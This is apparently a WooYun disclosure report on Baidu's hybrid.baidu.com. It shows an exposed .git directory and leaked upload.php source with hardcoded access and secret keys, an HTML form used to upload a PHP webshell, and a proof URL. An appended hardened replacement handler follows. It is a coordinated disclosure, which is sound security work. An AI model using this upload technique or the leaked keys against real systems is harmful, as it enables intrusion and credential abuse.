
Vulnerability summary

Defect ID: wooyun-2015-0114272

Title: Baidu: from git information disclosure to getshell and roaming the intranet

Vendor: 百度 (Baidu)

Author: 杀器王子

Submitted: 2015-05-15 13:25

Fixed: 2015-07-03 13:44

Published: 2015-07-03 13:44

Vulnerability type: Successful intrusion event

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-05-15: Details sent to the vendor, awaiting vendor handling
2015-05-19: Vendor confirmed; details visible to the vendor only
2015-05-29: Details disclosed to core white hats and domain experts
2015-06-08: Details disclosed to regular white hats
2015-06-18: Details disclosed to intern white hats
2015-07-03: Details disclosed to the public

Brief description:

With the killer tool in hand, the world is mine!

Detailed description:

http://hybrid.baidu.com/.git/config
A git information disclosure: the repository's source code can be downloaded.

➜  hybrid.baidu.com git:(master) ✗ ls -lh
total 0
drwxr-xr-x 22 tank staff 748B 5 15 12:46 general
drwxr-xr-x 20 tank staff 680B 5 15 13:09 wenku


There is an upload.php inside; let's take a look:

<?php
/**
 * Upload
 */
error_reporting(0);
session_start();
$allow_sep = "1"; // minimum interval between uploads, in seconds, to stop rapid refreshes of this file from re-uploading
if (isset($_SESSION['post_sep']))
{
    if (time() - $_SESSION['post_sep'] < $allow_sep)
    {
        exit('wait 1 second');
    }
    else
    {
        $_SESSION['post_sep'] = time();
    }
}
else
{
    $_SESSION['post_sep'] = time();
}
date_default_timezone_set('Asia/Shanghai');
if($_SERVER['REQUEST_URI']) {
    $temp = urldecode($_SERVER['REQUEST_URI']);
    if(strpos($temp, '<') !== false || strpos($temp, '>') !== false || strpos($temp, '(') !== false || strpos($temp, '"') !== false) {
        exit('Request Bad url');
    }
}
if($_FILES['Filedata']['size'] != 0){
    if(isset($_FILES['Filedata']) && is_array($_FILES['Filedata'])) {
        $attach = $_FILES['Filedata'];
    }
    $max_upload_size = 10485760; // in bytes
    $old_attachName = mb_detect_encoding($attach['name'])=='UTF-8'?$attach['name']:iconv('gbk',"utf-8",$attach['name']);
    $attach['ext'] = explode('.', $attach['name']);
    if (($length = count($attach['ext'])) > 1) {
        $ext = strtolower($attach['ext'][$length - 1]);
    }
    $year = date("Y");
    $month = date("m");
    $day = date("d");
    $fnamehash = md5(uniqid(microtime())); // fnamehash is the MD5 hash of the current time, used to rename the attachment
    $new_dir_name = $year.'-'.$month.'-'.$day.'-'.$fnamehash;
    $object = '/www'.'.'.$ext;
    if(!file_exists(dirname(__FILE__).'/temp/'.$new_dir_name)){
        mkdir(dirname(__FILE__).'/temp/'.$new_dir_name, 0777);
    }
    $path =$attach['tmp_name'];
    $opt=array(
        "filename"=>$old_attachName,
        "acl"=>"public-read"
    );
    move_uploaded_file($path,
        dirname(__FILE__). "/temp/".$new_dir_name . $object);
    //echo "http://10.42.82.59/zhaojie/temp".$object;
    echo dirname(__FILE__)."/temp/".$new_dir_name . $object;
    return;
    //require_once('./bcs/bcs.class.php');
    /*
    $host = 'bcs-sandbox.baidu.com'; //offline
    $ak = 'J78GkSfzDt1VmNlvy2Erg5uErXofKbTXZa9';
    $sk = '6xvpoHR2tCpkHXGBHLtfzPqRq0oGamyWa';
    $bucket = 'auto-pack-bucket-nanjing';
    $baidu_bcs = new BaiduBCS ( $ak, $sk, $host );
    if ($attach['size'] > $max_upload_size) {
        //@unlink($attach['tmp_name']);
        echo 'max limited';}
    $response = $baidu_bcs->create_object ( $bucket, $object, $path ,$opt); // upload the attachment
    if (! $response->isOK ()) die ( "upload object failed." );
    $opt = array ();
    $opt ["time"] = time () + 3600; // optional; the link is valid for one hour from the current Unix timestamp
    */
    echo $baidu_bcs->generate_get_object_url ( $bucket, $object, $opt );
}
?>


getshell

<html>
<body>
    <form action="http://hybrid.baidu.com/wenku/upload.php" method="post"
          enctype="multipart/form-data">
        <label for="file">Filename:</label>
        <input type="file" name="Filedata" id="file" />
        <br />
        <input type="submit" name="submit" value="Submit" />
    </form>
</body>
</html>

Proof of vulnerability:

http://hybrid.baidu.com/wenku/temp/2015-05-15-e876c4f4056327c58fa22e467e8e5d7f/www.php

[Screenshot: baidu.png]

[Screenshot: baidu2.png]

[Screenshot: baidu3.png]

Fix suggestion:

git
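Beyond removing the exposed .git directory, the upload handler itself needs an allowlist. The following is a hardened replacement for the leaked upload.php, added here as an example; it is not part of the original report or Baidu's code. The image-only allowlist and the UPLOAD_DIR path outside the web root are assumptions.

```php
<?php
// Added example, not Baidu's code: a hardened replacement for the leaked upload.php.
// Assumption: uploads are images only, stored under UPLOAD_DIR outside the web root.
const UPLOAD_DIR = '/srv/uploads';          // hypothetical path, not served by PHP
const MAX_UPLOAD_SIZE = 10485760;           // 10 MiB, same limit as the original
const ALLOWED = [                           // extension => expected MIME type
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'gif' => 'image/gif',
];

function safe_upload(array $file): string {
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_UPLOAD_SIZE) {  // the original only checked this in commented-out code
        throw new RuntimeException('max limited');
    }
    // The extension must be on the allowlist; the original accepted any extension, so "www.php" was stored.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('file type not allowed');
    }
    // Check the content, not just the name: the magic bytes must match the extension.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // Random name from a CSPRNG instead of md5(uniqid(microtime())), so the stored path is unpredictable.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dir = UPLOAD_DIR . '/' . date('Y-m-d');
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {   // 0750, not the original 0777
        throw new RuntimeException('cannot create upload dir');
    }
    $dest = $dir . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('cannot store file');
    }
    chmod($dest, 0640);                                // never executable
    return $dest;
}

if (isset($_FILES['Filedata'])) {
    try {
        echo basename(safe_upload($_FILES['Filedata']));  // return only the name, never the server path
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo $e->getMessage();
    }
}
```

With this handler, the form shown above still submits, but a .php upload is rejected at the allowlist and the stored file is never reachable as a script.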

Copyright notice: when reposting, please credit the source as 杀器王子@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-05-19 13:43

Vendor reply:

Thanks

Latest status:

None yet